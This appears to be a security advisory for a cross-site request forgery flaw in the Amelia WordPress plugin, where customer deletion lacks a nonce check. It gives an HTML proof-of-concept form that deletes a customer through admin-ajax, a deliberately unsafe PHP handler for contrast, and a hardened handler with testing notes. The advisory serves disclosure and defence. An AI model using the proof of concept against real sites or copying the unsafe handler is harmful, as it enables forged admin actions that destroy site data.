The plugin does not have a CSRF check in place when deleting customers, which could allow attackers to make a logged-in admin delete arbitrary customers via a CSRF attack.
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=wpamelia_api&call=/users/customers/delete/1" method="POST">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
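The fix on the plugin side is the standard WordPress pattern for state-changing admin-ajax calls: verify a nonce tied to the logged-in user, then check the capability, before touching any data. The following is an added illustration written for this page, not Amelia's own code; the hook name, nonce action, delete_customer_example() data-layer call and parameter names are hypothetical placeholders. The unsafe handler mirrors the behaviour the advisory describes and is shown only for contrast; only the hardened one is hooked.

```php
<?php
// Added illustration, not the plugin's code. Assumes a hypothetical admin-ajax
// handler for the "delete customer" call; hook, nonce and function names are
// placeholders.

// Unsafe pattern: the deletion runs as soon as the request arrives from a
// logged-in admin. Browsers attach the admin's cookies to a cross-site POST,
// so a third-party page submitting the form above is enough to trigger it.
function amelia_example_delete_customer_unsafe() {
    // Mirrors the PoC URL shape: call=/users/customers/delete/<id>
    $customer_id = isset( $_GET['call'] ) ? (int) basename( $_GET['call'] ) : 0;
    delete_customer_example( $customer_id ); // hypothetical data-layer call
    wp_send_json_success();
}

// Hardened pattern: a nonce bound to the current user's session must be
// present and valid, and the user must hold the required capability.
// A cross-site page cannot read the nonce, so a forged request is rejected
// before any state changes.
function amelia_example_delete_customer_safe() {
    // check_ajax_referer() terminates the request with -1 (HTTP 403) when the
    // nonce is missing or invalid; '_ajax_nonce' is its default parameter name.
    check_ajax_referer( 'amelia_example_delete_customer', '_ajax_nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // Take the id from the POST body rather than a free-form path segment.
    $customer_id = isset( $_POST['customer_id'] ) ? absint( $_POST['customer_id'] ) : 0;
    if ( 0 === $customer_id ) {
        wp_send_json_error( 'invalid customer id', 400 );
    }

    delete_customer_example( $customer_id ); // hypothetical data-layer call
    wp_send_json_success();
}
add_action( 'wp_ajax_amelia_example_delete_customer', 'amelia_example_delete_customer_safe' );

// The legitimate admin UI needs the nonce; hand it to the admin script so the
// real front-end can include it as _ajax_nonce in its POST.
function amelia_example_enqueue_admin_script() {
    wp_enqueue_script( 'amelia-example-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'amelia-example-admin', 'ameliaExample', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'amelia_example_delete_customer' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'amelia_example_enqueue_admin_script' );
```

Two points worth noting when reviewing a handler like this: a capability check alone does not stop CSRF, because the forged request is made by a user who already has the capability, and a nonce check alone is weaker than both together, since WordPress nonces are per-user tokens, not a replacement for authorization. Testing the fix is simple: replaying the PoC form against the hardened endpoint should return -1 with a 403 status instead of deleting the customer.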
Muhamad Hidayat
Yes
2022-02-23 (about 1 year ago)
2022-02-23 (about 1 year ago)
2022-04-11 (about 1 year ago)